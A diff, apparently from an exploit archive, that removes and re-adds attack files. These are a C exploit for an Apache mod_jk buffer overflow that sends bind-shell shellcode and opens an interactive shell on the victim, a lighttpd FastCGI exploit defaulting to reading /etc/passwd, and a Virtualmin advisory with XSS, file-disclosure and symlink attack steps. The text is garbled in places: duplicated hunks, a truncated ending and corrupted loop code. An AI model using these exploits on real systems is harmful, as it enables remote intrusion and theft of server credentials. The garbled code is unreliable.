MAP_URI_TO_WORKER_1_FC6 0x080476a4 /* (0x2040),(0x201c) */ -#define MAP_URI_TO_WORKER_2 0x82828282 -#define MAP_URI_TO_WORKER_3 0x08048014 - -/* parody */ -#define HOST_PARAM "0x82-apache-mod_jk.c" /* Host */ -#define DEFAULT_CMDZ "uname -a;id;echo 'hehe, its GOBBLES style!';export TERM=vt100;exec bash -i\n" -#define PADDING_1 'A' -#define PADDING_2 'B' -#define PADDING_3 'C' -#define RET_ADDR_INC (0x2000) -#define SH_PORT 8282 - -char library_shellcode[]= - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - /* linux_ia32_bind - LPORT=8282 Size=108 Encoder=PexFnstenvSub http://metasploit.com */ - "\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0" - "\x2c\x54\x7f\x83\xeb\xfc\xe2\xf4\xd1\xf7\x07\x3c\xb3\x46\x56\x15" - "\x86\x74\xcd\xf6\x01\xe1\xd4\xe9\xa3\x7e\x32\x17\xc0\x76\x32\x2c" - "\x69\xcd\x3e\x19\xb8\x7c\x05\x29\x69\xcd\x99\xff\x50\x4a\x85\x9c" - "\x2d\xac\x06\x2d\xb6\x6f\xdd\x9e\x50\x4a\x99\xff\x73\x46\x56\x26" - 
"\x50\x13\x99\xff\xa9\x55\xad\xcf\xeb\x7e\x3c\x50\xcf\x5f\x3c\x17" - "\xcf\x4e\x3d\x11\x69\xcf\x06\x2c\x69\xcd\x99\xff"; - -struct { - int num; - char *type; - int ret_count; - u_long retaddr; - u_long strcpy_plt; - int offset; - u_long pop_pop_pop_ret_code; - u_long pop_pop_ret_code; - u_long ret_code; - u_long worker_arg1; -} targets[] = { - {0,"Fedora Core release 5 (Bordeaux) - exec-shield\n" - "\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n" - "\ttarball install: /usr/local/apache\n" - "\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz", - 3,0x100104,0x08060c80,4112,0x08060dc4,0,0,MAP_URI_TO_WORKER_1_FC5}, - - {1,"Fedora Core release 6 (Zod) - exec-shield\n" - "\tApache/2.0.49 (Unix) mod_jk/1.2.19\n" - "\ttarball install: /usr/local/apache\n" - "\tbinary install: mod_jk-apache-2.0.49-linux-i686.so", - 27,0x100104,0x0805fe74,4124,0x08061489,0,0,MAP_URI_TO_WORKER_1_FC6}, - - {2,"Fedora Core release 6 (Zod) - exec-shield\n" - "\tApache/2.0.49 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n" - "\ttarball install: /usr/local/apache\n" - "\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz", - 23,0x100104,0x0805fe74,4112,0x08061489,0,0,MAP_URI_TO_WORKER_1_FC6}, - - {3,"Fedora Core release 6 (Zod) - exec-shield\n" - "\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n" - "\ttarball install: /usr/local/apache\n" - "\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz", - 3,0x100104,0x08060164,4112,0x080614d4,0,0,MAP_URI_TO_WORKER_1_FC6}, -}, victim; - -void re_connt(int sock); -void conn_shell(int sock,char *cmdz); -void usage(char *argv0); -void banrl(); - -int main(int argc,char *argv[]){ - int sock; - int i=0,j=0,l=0,b=0; - unsigned char do_ex[8192]; - unsigned char ex_buf[8192*2]; - unsigned char sm_buf[4]; - char *hostp=NULL,*portp=NULL,*cmdz=DEFAULT_CMDZ; - - memset(&victim,0,sizeof(victim)); - banrl(); - while((i=getopt(argc,argv,"h:t:c:r:s:p:o:m:C:"))!=-1){ - switch(i){ - case 'h': - hostp=(char *)strtok(optarg,":"); - if((portp=(char 
*)strtok(NULL,":"))==NULL) - portp="80"; - break; - case 't': - if(atoi(optarg)>=sizeof(targets)/sizeof(victim)){ - usage(argv[0]); - return -1; - } - memcpy(&victim,&targets[atoi(optarg)],sizeof(victim)); - break; - case 'c': - victim.ret_count=atoi(optarg); - break; - case 'r': - victim.retaddr=strtoul(optarg,NULL,16); - break; - case 's': - victim.strcpy_plt=strtoul(optarg,NULL,16); - break; - case 'p': - victim.pop_pop_pop_ret_code=strtoul(optarg,NULL,16); - break; - case 'o': - victim.offset=atoi(optarg); - break; - case 'm': - victim.worker_arg1=strtoul(optarg,NULL,16); - break; - case 'C': - cmdz=optarg; - break; - default: - usage(argv[0]); - break; - } - } - if(!victim.ret_count||!victim.retaddr||!victim.strcpy_plt||!victim.offset||!victim.pop_pop_pop_ret_code||!victim.worker_arg1||!hostp||!portp){ - usage(argv[0]); - return -1; - } - - victim.pop_pop_ret_code=victim.pop_pop_pop_ret_code+1; - victim.ret_code=victim.pop_pop_pop_ret_code+3; - - printf("[*] os: %s\n\n",victim.type); - printf("[*] host: %s\n",hostp); - printf("[*] port: %s\n",portp); - printf("[*] count: %d\n",victim.ret_count); - printf("[*] strcpy@plt: %p\n",victim.strcpy_plt); - printf("[*] offset: %d\n",victim.offset); - printf("[*] pop_pop_pop_ret_code: %p\n",victim.pop_pop_pop_ret_code); - printf("[*] pop_pop_ret_code: %p\n",victim.pop_pop_ret_code); - printf("[*] ret_code: %p\n",victim.ret_code); - printf("[*] map_uri_to_worker() arg1: %p\n",victim.worker_arg1); - printf("[*] start retaddr: %p\n\n",victim.retaddr); - - putchar(';'); - srand(getpid()); - - for(b=0;;victim.retaddr+=RET_ADDR_INC){ - - putchar((rand()%2)? 
'P':'p'); - fflush(stdout); - - usleep(100000); - - memset((char *)do_ex,0,sizeof(do_ex)); - memset((char *)ex_buf,0,sizeof(ex_buf)); - memset((char *)sm_buf,0,sizeof(sm_buf)); - -#define __GOGOSSING(dest,index,src){\ - *(long *)&dest[index]=src;\ - index+=4;\ -} - for(i=0;i0x08)&&(do_ex[j]<0x0e)){ - memset((char *)sm_buf,0,sizeof(sm_buf)); - sprintf(sm_buf,"%02x",do_ex[j]); - ex_buf[l++]='%'; - ex_buf[l++]=sm_buf[0]; - ex_buf[l++]=sm_buf[1]; - } - else ex_buf[l++]=do_ex[j]; - } - l=strlen(ex_buf); - sprintf(ex_buf+l," HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\n\r\n",library_shellcode,HOST_PARAM); - sock=setsock(hostp,atoi(portp)); - re_connt(sock); - send(sock,ex_buf,strlen(ex_buf),0); - close(sock); - - sock=setsock(hostp,SH_PORT); - if(sock!=-1){ - printf("\nTHIS IS KOREAAAAA~!: ret_count=%d, retaddr=%p, strcpy@plt=%p,\n" - "pop3/ret=%p, worker_arg1=%p\n\n",victim.ret_count,victim.retaddr, - victim.strcpy_plt,victim.pop_pop_pop_ret_code,victim.worker_arg1); - conn_shell(sock,cmdz); - exit(-1); - } - } -} - -int setsock(char *host,int port) -{ - int sock; - struct hostent *he; - struct sockaddr_in x82_addr; - - if((he=gethostbyname(host))==NULL) - { - return -1; - } - if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF) - { - return -1; - } - x82_addr.sin_family=AF_INET; - x82_addr.sin_port=htons(port); - x82_addr.sin_addr=*((struct in_addr *)he->h_addr); - bzero(&(x82_addr.sin_zero),8); - - if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF) - { - return -1; - } - return(sock); -} - -void re_connt(int sock) -{ - if(sock==-1) - { - printf("\n[-] "); - fflush(stdout); - perror("connect()"); - printf("[-] exploit failed.\n"); - exit(-1); - } -} - -void conn_shell(int sock,char *cmdz) -{ - int pckt; - char rbuf[1024]; - fd_set rset; - memset((char *)rbuf,0,1024); - send(sock,cmdz,strlen(cmdz),0); - - while(1) - { - fflush(stdout); - FD_ZERO(&rset); - FD_SET(sock,&rset); - FD_SET(STDIN_FILENO,&rset); - select(sock+1,&rset,NULL,NULL,NULL); - - 
if(FD_ISSET(sock,&rset)) - { - pckt=read(sock,rbuf,1024); - if(pckt<=0) - { - exit(0); - } - rbuf[pckt]=0; - printf("%s",rbuf); - } - if(FD_ISSET(STDIN_FILENO,&rset)) - { - pckt=read(STDIN_FILENO,rbuf,1024); - if(pckt>0) - { - rbuf[pckt]=0; - write(sock,rbuf,pckt); - } - } - } - return; -} - -void usage(char *argv0){ - int i; - - printf("Usage: %s <-switches> -h host[:80]\n",argv0); - printf(" -h host[:port]\tHost\n"); - printf(" -t number\t\tTarget id.\n"); - printf(" -c ret_count\t\tret count\n"); - printf(" -r retaddr\t\tstart library retaddr\n"); - printf(" -s strcpy@plt\t\tstrcpy plt address\n"); - printf(" -p pop3/ret\t\tpop3/ret address\n"); - printf(" -o offset\t\tOffset\n"); - printf(" -m worker_arg1\tmap_uri_to_worker() arg1\n"); - printf(" -C cmdz\t\tCommands\n"); - printf("\nExample: %s -t 0 -h apache_tomcat.target.kr\n",argv0); - printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n"); - printf(" ID / Return addr / Target specification\n"); - for(i=0;i's exploit (Win32): +** http://downloads.securityfocus.com/vulnerabilities/exploits/apache_modjk_overflow.rb +** +** -- +** exploit by "you dong-hun"(Xpl017Elz), . 
+** My World: http://x82.inetcop.org +** +*/ + +#include +#include +#include +#include +#include +#include +#include +#ifdef __linux__ +#include +#endif + +#define MAP_URI_TO_WORKER_1_FC5 0x080474bc /* (0x2040),(0x201c) */ +#define MAP_URI_TO_WORKER_1_FC6 0x080476a4 /* (0x2040),(0x201c) */ +#define MAP_URI_TO_WORKER_2 0x82828282 +#define MAP_URI_TO_WORKER_3 0x08048014 + +/* parody */ +#define HOST_PARAM "0x82-apache-mod_jk.c" /* Host */ +#define DEFAULT_CMDZ "uname -a;id;echo 'hehe, its GOBBLES style!';export TERM=vt100;exec bash -i\n" +#define PADDING_1 'A' +#define PADDING_2 'B' +#define PADDING_3 'C' +#define RET_ADDR_INC (0x2000) +#define SH_PORT 8282 + +char library_shellcode[]= + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + /* linux_ia32_bind - LPORT=8282 Size=108 Encoder=PexFnstenvSub http://metasploit.com */ + "\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0" + "\x2c\x54\x7f\x83\xeb\xfc\xe2\xf4\xd1\xf7\x07\x3c\xb3\x46\x56\x15" + "\x86\x74\xcd\xf6\x01\xe1\xd4\xe9\xa3\x7e\x32\x17\xc0\x76\x32\x2c" + "\x69\xcd\x3e\x19\xb8\x7c\x05\x29\x69\xcd\x99\xff\x50\x4a\x85\x9c" + "\x2d\xac\x06\x2d\xb6\x6f\xdd\x9e\x50\x4a\x99\xff\x73\x46\x56\x26" + "\x50\x13\x99\xff\xa9\x55\xad\xcf\xeb\x7e\x3c\x50\xcf\x5f\x3c\x17" + "\xcf\x4e\x3d\x11\x69\xcf\x06\x2c\x69\xcd\x99\xff"; + +struct { + int num; + char *type; + int ret_count; + u_long retaddr; + u_long strcpy_plt; + int offset; + u_long pop_pop_pop_ret_code; + u_long pop_pop_ret_code; + u_long ret_code; + u_long worker_arg1; +} targets[] = { + {0,"Fedora Core release 5 (Bordeaux) - exec-shield\n" + "\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n" + "\ttarball install: /usr/local/apache\n" + "\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz", + 3,0x100104,0x08060c80,4112,0x08060dc4,0,0,MAP_URI_TO_WORKER_1_FC5}, + + {1,"Fedora Core release 6 
(Zod) - exec-shield\n" + "\tApache/2.0.49 (Unix) mod_jk/1.2.19\n" + "\ttarball install: /usr/local/apache\n" + "\tbinary install: mod_jk-apache-2.0.49-linux-i686.so", + 27,0x100104,0x0805fe74,4124,0x08061489,0,0,MAP_URI_TO_WORKER_1_FC6}, + + {2,"Fedora Core release 6 (Zod) - exec-shield\n" + "\tApache/2.0.49 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n" + "\ttarball install: /usr/local/apache\n" + "\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz", + 23,0x100104,0x0805fe74,4112,0x08061489,0,0,MAP_URI_TO_WORKER_1_FC6}, + + {3,"Fedora Core release 6 (Zod) - exec-shield\n" + "\tApache/2.0.59 (Unix) mod_jk/1.2.19, mod_jk/1.2.20\n" + "\ttarball install: /usr/local/apache\n" + "\ttarball install: tomcat-connectors-1.2.xx-src.tar.gz", + 3,0x100104,0x08060164,4112,0x080614d4,0,0,MAP_URI_TO_WORKER_1_FC6}, +}, victim; + +void re_connt(int sock); +void conn_shell(int sock,char *cmdz); +void usage(char *argv0); +void banrl(); + +int main(int argc,char *argv[]){ + int sock; + int i=0,j=0,l=0,b=0; + unsigned char do_ex[8192]; + unsigned char ex_buf[8192*2]; + unsigned char sm_buf[4]; + char *hostp=NULL,*portp=NULL,*cmdz=DEFAULT_CMDZ; + + memset(&victim,0,sizeof(victim)); + banrl(); + while((i=getopt(argc,argv,"h:t:c:r:s:p:o:m:C:"))!=-1){ + switch(i){ + case 'h': + hostp=(char *)strtok(optarg,":"); + if((portp=(char *)strtok(NULL,":"))==NULL) + portp="80"; + break; + case 't': + if(atoi(optarg)>=sizeof(targets)/sizeof(victim)){ + usage(argv[0]); + return -1; + } + memcpy(&victim,&targets[atoi(optarg)],sizeof(victim)); + break; + case 'c': + victim.ret_count=atoi(optarg); + break; + case 'r': + victim.retaddr=strtoul(optarg,NULL,16); + break; + case 's': + victim.strcpy_plt=strtoul(optarg,NULL,16); + break; + case 'p': + victim.pop_pop_pop_ret_code=strtoul(optarg,NULL,16); + break; + case 'o': + victim.offset=atoi(optarg); + break; + case 'm': + victim.worker_arg1=strtoul(optarg,NULL,16); + break; + case 'C': + cmdz=optarg; + break; + default: + usage(argv[0]); + break; + } + } + 
if(!victim.ret_count||!victim.retaddr||!victim.strcpy_plt||!victim.offset||!victim.pop_pop_pop_ret_code||!victim.worker_arg1||!hostp||!portp){ + usage(argv[0]); + return -1; + } + + victim.pop_pop_ret_code=victim.pop_pop_pop_ret_code+1; + victim.ret_code=victim.pop_pop_pop_ret_code+3; + + printf("[*] os: %s\n\n",victim.type); + printf("[*] host: %s\n",hostp); + printf("[*] port: %s\n",portp); + printf("[*] count: %d\n",victim.ret_count); + printf("[*] strcpy@plt: %p\n",victim.strcpy_plt); + printf("[*] offset: %d\n",victim.offset); + printf("[*] pop_pop_pop_ret_code: %p\n",victim.pop_pop_pop_ret_code); + printf("[*] pop_pop_ret_code: %p\n",victim.pop_pop_ret_code); + printf("[*] ret_code: %p\n",victim.ret_code); + printf("[*] map_uri_to_worker() arg1: %p\n",victim.worker_arg1); + printf("[*] start retaddr: %p\n\n",victim.retaddr); + + putchar(';'); + srand(getpid()); + + for(b=0;;victim.retaddr+=RET_ADDR_INC){ + + putchar((rand()%2)? 'P':'p'); + fflush(stdout); + + usleep(100000); + + memset((char *)do_ex,0,sizeof(do_ex)); + memset((char *)ex_buf,0,sizeof(ex_buf)); + memset((char *)sm_buf,0,sizeof(sm_buf)); + +#define __GOGOSSING(dest,index,src){\ + *(long *)&dest[index]=src;\ + index+=4;\ +} + for(i=0;i0x08)&&(do_ex[j]<0x0e)){ + memset((char *)sm_buf,0,sizeof(sm_buf)); + sprintf(sm_buf,"%02x",do_ex[j]); + ex_buf[l++]='%'; + ex_buf[l++]=sm_buf[0]; + ex_buf[l++]=sm_buf[1]; + } + else ex_buf[l++]=do_ex[j]; + } + l=strlen(ex_buf); + sprintf(ex_buf+l," HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\n\r\n",library_shellcode,HOST_PARAM); + sock=setsock(hostp,atoi(portp)); + re_connt(sock); + send(sock,ex_buf,strlen(ex_buf),0); + close(sock); + + sock=setsock(hostp,SH_PORT); + if(sock!=-1){ + printf("\nTHIS IS KOREAAAAA~!: ret_count=%d, retaddr=%p, strcpy@plt=%p,\n" + "pop3/ret=%p, worker_arg1=%p\n\n",victim.ret_count,victim.retaddr, + victim.strcpy_plt,victim.pop_pop_pop_ret_code,victim.worker_arg1); + conn_shell(sock,cmdz); + exit(-1); + } + } +} + +int setsock(char *host,int 
port) +{ + int sock; + struct hostent *he; + struct sockaddr_in x82_addr; + + if((he=gethostbyname(host))==NULL) + { + return -1; + } + if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF) + { + return -1; + } + x82_addr.sin_family=AF_INET; + x82_addr.sin_port=htons(port); + x82_addr.sin_addr=*((struct in_addr *)he->h_addr); + bzero(&(x82_addr.sin_zero),8); + + if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF) + { + return -1; + } + return(sock); +} + +void re_connt(int sock) +{ + if(sock==-1) + { + printf("\n[-] "); + fflush(stdout); + perror("connect()"); + printf("[-] exploit failed.\n"); + exit(-1); + } +} + +void conn_shell(int sock,char *cmdz) +{ + int pckt; + char rbuf[1024]; + fd_set rset; + memset((char *)rbuf,0,1024); + send(sock,cmdz,strlen(cmdz),0); + + while(1) + { + fflush(stdout); + FD_ZERO(&rset); + FD_SET(sock,&rset); + FD_SET(STDIN_FILENO,&rset); + select(sock+1,&rset,NULL,NULL,NULL); + + if(FD_ISSET(sock,&rset)) + { + pckt=read(sock,rbuf,1024); + if(pckt<=0) + { + exit(0); + } + rbuf[pckt]=0; + printf("%s",rbuf); + } + if(FD_ISSET(STDIN_FILENO,&rset)) + { + pckt=read(STDIN_FILENO,rbuf,1024); + if(pckt>0) + { + rbuf[pckt]=0; + write(sock,rbuf,pckt); + } + } + } + return; +} + +void usage(char *argv0){ + int i; + + printf("Usage: %s <-switches> -h host[:80]\n",argv0); + printf(" -h host[:port]\tHost\n"); + printf(" -t number\t\tTarget id.\n"); + printf(" -c ret_count\t\tret count\n"); + printf(" -r retaddr\t\tstart library retaddr\n"); + printf(" -s strcpy@plt\t\tstrcpy plt address\n"); + printf(" -p pop3/ret\t\tpop3/ret address\n"); + printf(" -o offset\t\tOffset\n"); + printf(" -m worker_arg1\tmap_uri_to_worker() arg1\n"); + printf(" -C cmdz\t\tCommands\n"); + printf("\nExample: %s -t 0 -h apache_tomcat.target.kr\n",argv0); + printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n"); + printf(" ID / Return addr / Target specification\n"); + for(i=0;i - * Philip Olausson - * 
http://www.secweb.se/en/advisories/lighttpd-fastcgi-remote-vulnerability/ - * - * FastCGI: - * http://www.fastcgi.com/devkit/doc/fcgi-spec.html - * - * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF- - * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY - * DAMAGE DONE USING THIS PROGRAM. - * - * VOID.AT Security - * andi@void.at - * http://www.void.at - * - ************************************************************/ -#include -#include -#include -#include -#include -#include -#include -#include -#include - -/* don't change this values except you know exactly what you are doing */ -#define REQUEST_SIZE_BASE 0x1530a - -char FILL_CHAR[] = "void"; -char RANDOM_CHAR[] = "01234567890" - "abcdefghijklmnopqrstuvwxyz" - "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; - - -/* just default values */ -#define DEFAULT_SCRIPT "/index.php" /* can be changed via -s */ -#define DEFAULT_PORT "80" /* can be changed via -p */ -#define DEFAULT_NAME "SCRIPT_FILENAME" /* can be changed via -n */ -#define DEFAULT_VALUE "/etc/passwd" /* can be change via -a */ - -#define DEFAULT_SEPARATOR ',' - -#define BUFFER_SIZE 1024 - -/* header data type - * defining header name/value content and length - * if a fixed value is set use this one instead of generating content - */ -struct header_t { - int name_length; - char name_char; - int value_length; - char value_char; - char *value_value; -}; - -/* generate_param - * generate character array (input: comma separated list) - */ -char *generate_param(int *param_size_out, - char **name, - char **value) { - char *param = NULL; - int param_size = 0; - int param_offset = 0; - int i; - int name_length = 0; - int value_length = 0; - - for (i = 0; name[i] != NULL && value[i] != NULL; i++) { - name_length = strlen(name[i]); - value_length = strlen(value[i]); - if (name_length > 127) { - param_size += 4; - } else { - param_size++; - } - if (value_length > 127) { - param_size += 4; - } else { - param_size++; - } - param_size += strlen(name[i]) + 
strlen(value[i]); - param = realloc(param, param_size); - if (param) { - if (strlen(name[i]) > 127) { - param[param_offset++] = (name_length >> 24) | 0x80; - param[param_offset++] = (name_length >> 16) & 0xff; - param[param_offset++] = (name_length >> 8) & 0xff; - param[param_offset++] = name_length & 0xff; - } else { - param[param_offset++] = name_length; - } - if (strlen(value[i]) > 127) { - param[param_offset++] = (value_length >> 24) | 0x80; - param[param_offset++] = (value_length >> 16) & 0xff; - param[param_offset++] = (value_length >> 8) & 0xff; - param[param_offset++] = value_length & 0xff; - } else { - param[param_offset++] = value_length; - } - memcpy(param + param_offset, name[i], name_length); - param_offset += name_length; - memcpy(param + param_offset, value[i], value_length); - param_offset += value_length; - } - } - - if (param) { - *param_size_out = param_size; - } - - return param; -} - -/* generate_buffer - * generate header name or value buffer - */ -char *generate_buffer(int length, char c, int random_mode) { - char *buffer = (char*)malloc(length + 1); - int i; - - if (buffer) { - memset(buffer, 0, length + 1); - if (random_mode) { - for (i = 0; i < length; i++) { - buffer[i] = RANDOM_CHAR[rand() % (strlen(RANDOM_CHAR))]; - } - } else { - memset(buffer, c, length); - } - } - - return buffer; -} - -/* generate_array - * generate character array (input: comma separated list) - */ -char **generate_array(char *list, char separator, int *length) { - char **data = NULL; - int i = 0; - int start = 0; - int j = 1; - - if (list) { - for (i = 0; i <= strlen(list); i++) { - if (list[i] == separator || - i == strlen(list)) { - data = realloc(data, (j + 1) * (sizeof(char*))); - if (data) { - data[j - 1] = malloc(i - start + 1); - if (data[j - 1]) { - strncpy(data[j - 1], list + start, i - start); - data[j - 1][i - start + 1] = 0; - } - data[j] = NULL; - } - start = i + 1; - j++; - } - } - *length = j; - } - - return data; -} - -/* generate_request - * 
generate http request to trigger the overflow in fastcgi module - * and overwrite fcgi param data with post content - */ -char *generate_request(char *server, char *port, - char *script, char **names, - char **values, int *length_out, - int random_mode) { - char *param; - int param_size; - char *request; - int offset; - int length; - int i; - int fillup; - char *name; - char *value; - - /* array of header data that is used to create header name and value lines - * most of this values can be changed -> only length is important and a - * few characters */ - struct header_t header[] = { - { 0x01, '0', 0x04, FILL_CHAR[0], NULL }, - { FILL_CHAR[0] - 0x5 - 0x2, 'B', FILL_CHAR[0] - 0x2, 'B', NULL }, - { 0x01, '1', 0x5450 - ( (FILL_CHAR[0] + 0x1) * 2) - 0x1 - 0x5 - 0x1 - 0x4, 'C', NULL }, - { 0x01, '2', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'D', NULL }, - { 0x01, '3', 0x04, FILL_CHAR[1], NULL }, - { FILL_CHAR[1] - 0x5 - 0x2, 'F', FILL_CHAR[1] - 0x2, 'F', NULL }, - { 0x01, '4', 0x5450 - ( (FILL_CHAR[1] + 0x1) * 2) - 0x1 - 0x5 - 0x1 - 0x4, 'H', NULL }, - { 0x01, '5', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'I', NULL }, - { 0x01, '6', 0x04, FILL_CHAR[2], NULL }, - { FILL_CHAR[2] - 0x5 - 0x2, 'K', FILL_CHAR[2] - 0x2, 'K', NULL }, - { 0x01, '7', 0x5450 - ( (FILL_CHAR[2] + 0x1) * 2) - 0x1 - 0x5 - 0x1 - 0x4, 'L', NULL }, - { 0x01, '8', '_' - 0x1 - 0x5 - 0x1 - 0x1, 'M', NULL }, - { 0x01, '9', 0, 0, "uvzz" }, - { FILL_CHAR[3] - 0x5 - 0x2, 'O', FILL_CHAR[3] - 0x2, 'O', NULL }, - { 0x01, 'z', 0x1cf - ((FILL_CHAR[3]- 0x1 ) * 2) -0x1 - 0x5 - 0x1 - 0x4, 'z', NULL }, - { 0x00, 0x00, 0x00, 0x00, NULL } - }; - - /* fill rest of post content with data */ - char content_part_one[] = { - 0x06, 0x80, 0x00, 0x00, 0x00, 'H', 'T', 'T', 'P', '_', 'W' - }; - - /* set a fake FastCGI record to mark the end of data */ - char content_part_two[] = { - 0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 - }; - - param = generate_param(¶m_size, names, values); - if (param && 
param_size > 0) { - fillup = 0x54af - 0x5f - 0x1e3 - param_size - 0x1 - 0x5 - 0x1 - 0x4; - length = REQUEST_SIZE_BASE + param_size + - strlen(server) + strlen(port) + - strlen(script); - request = (char*)malloc(length); - if (request) { - memset(request, 0, length); - offset = sprintf(request, - "POST %s HTTP/1.1\r\n" - "Host: %s:%s\r\n" - "Connection: close\r\n" - "Content-Length: %d\r\n" - "Content-Type: application/x-www-form-urlencoded\r\n", - script, - server, port, - fillup + param_size + sizeof(content_part_one) + - sizeof(content_part_two) + 0x5f); - for (i = 0; header[i].name_length != 0; i++) { - name = generate_buffer(header[i].name_length, - header[i].name_char, - header[i].name_length != 1 ? random_mode : 0); - - if (header[i].value_value) { - value = header[i].value_value; - } else { - value = generate_buffer(header[i].value_length, - header[i].value_char, - header[i].value_length != 4 && - header[i].value_char != 'z' ? random_mode : 0); - } - - offset += sprintf(request + offset, - "%s: %s\r\n", name, value); - if (!header[i].value_value) { - free(value); - } - free(name); - } - - offset += sprintf(request + offset, "\r\n"); - - memcpy(request + offset, param, param_size); - offset += param_size; - - content_part_one[0x03] = (fillup >> 8) & 0xff; - content_part_one[0x04] = fillup & 0xff; - for (i = 0; i < sizeof(content_part_one); i++) { - request[offset++] = content_part_one[i]; - } - for (i = 0; i < fillup + 0x5f; i++) { - request[offset++] = random_mode ? 
RANDOM_CHAR[rand() % (strlen(RANDOM_CHAR))] : 'W'; - } - for (i = 0; i < sizeof(content_part_two); i++) { - request[offset++] = content_part_two[i]; - } - - *length_out = offset; - } - } - - return request; -} - -/* usage - * display help screen - */ -void usage(int argc, char **argv) { - fprintf(stderr, - "usage: %s [-h] [-v] [-r] [-d ] [-s -https://127.0.0.1:10000/virtual-server/link.cgi/%3Ci%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E - -#3 Anonymous proxy -The attacker is able to use "Preview Website" featrue to hide hers real -location and conduct attacks on different servers in the Internet. - -Example: -https://127.0.0.1:10000/virtual-server/link.cgi/67.228.198.99/http://www.virtualmin.com/ - -#4 Information disclousure -It's possible to view and/or copy any file on the server due to system() -call -in mysql module, which copies any file specified by the user -to Virtualmin temporary dir. Note it's a time based attack as the copied -file -is almost immediately removed after creation. - -#5 Information disclousure -It's possible to view any file on the server because Virtualmin doesn't drop -root privileges to perform some of its actions. - -Example: -Use the "Execute SQL" feature in the mysql module by passing -"/etc/master.passwd" parameter as the file path to the .sql file: - --- cut -- -Output from SQL commands in file /etc/master.passwd .. -ERROR 1064 (42000) at line 3: You have an error in your SQL syntax; -check the manual that corresponds to your MySQL server version for the -right syntax to use near 'root:$1$HASH_HERE.:0:0::0:0:Charlie -&:/root:/usr/local/bin/' at line 1 --- cut -- - -#6 Symlink attacks -There are Virtualmin modules which allows the attacker to conduct a -successful symlink attack, which may lead to a full compromise of the -server. 
- -Example for "Backup Virtual Servers": -1) Regular user creates backupdir and symlink: - $ mkdir virtualmin-backup && ln -s /etc/master.passwd -virtualmin-backup/test - $ ls -la /etc/master.passwd - -rw------- 1 root wheel 1024 Jan 19 23:08 /etc/master.passwd - -2) From the panel regular user creates backup: - "Backup and Restore" -> "Backup Virtual Servers" and "Destination and -format" - -set options to: - - Backup destination [x] File or directory under virtualmin-backup/ - "test" - Backup format [x] Single archive file - -and create backup by submitting "Backup Now". - -3) Regular user now owns the symlinked file: - $ ls -la /etc/master.passwd - -rw------- 1 user user 1024 Jan 21 00:51 /etc/master.passwd - -Status: -The vendor has provided updates and solutions to all vulnerabilities -described above. Upgrading immediately is strongly recommended for all -Virtualmin users. - -Disclosure timeline: -21 VI 2009: Detailed information with examples and PoCs sent to the vendor. -24 VI 2009: Initial vendor response. -25 VI 2009: Few more vulnerabilities with examples and PoCs sent to the -vendor. -26 VI 2009: Hot fix for the mysql module released by the vendor. -05 VII 2009: New version of the Virtualmin with fixes released by the -vendor. -14 VII 2009: Security bulletin released. - -Links: -* http://www.virtualmin.com/ -* http://www.virtualmin.com/node/10412 -* http://www.virtualmin.com/node/10413 - - -Best regards, -Filip Palian - -# milw0rm.com [2009-07-14] +Virtualmin Multiple Vulnerabilities + +by Filip Palian +https://127.0.0.1:10000/virtual-server/link.cgi/%3Ci%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E + +#3 Anonymous proxy +The attacker is able to use "Preview Website" featrue to hide hers real +location and conduct attacks on different servers in the Internet. 
+ +Example: +https://127.0.0.1:10000/virtual-server/link.cgi/67.228.198.99/http://www.virtualmin.com/ + +#4 Information disclousure +It's possible to view and/or copy any file on the server due to system() +call +in mysql module, which copies any file specified by the user +to Virtualmin temporary dir. Note it's a time based attack as the copied +file +is almost immediately removed after creation. + +#5 Information disclousure +It's possible to view any file on the server because Virtualmin doesn't drop +root privileges to perform some of its actions. + +Example: +Use the "Execute SQL" feature in the mysql module by passing +"/etc/master.passwd" parameter as the file path to the .sql file: + +-- cut -- +Output from SQL commands in file /etc/master.passwd .. +ERROR 1064 (42000) at line 3: You have an error in your SQL syntax; +check the manual that corresponds to your MySQL server version for the +right syntax to use near 'root:$1$HASH_HERE.:0:0::0:0:Charlie +&:/root:/usr/local/bin/' at line 1 +-- cut -- + +#6 Symlink attacks +There are Virtualmin modules which allows the attacker to conduct a +successful symlink 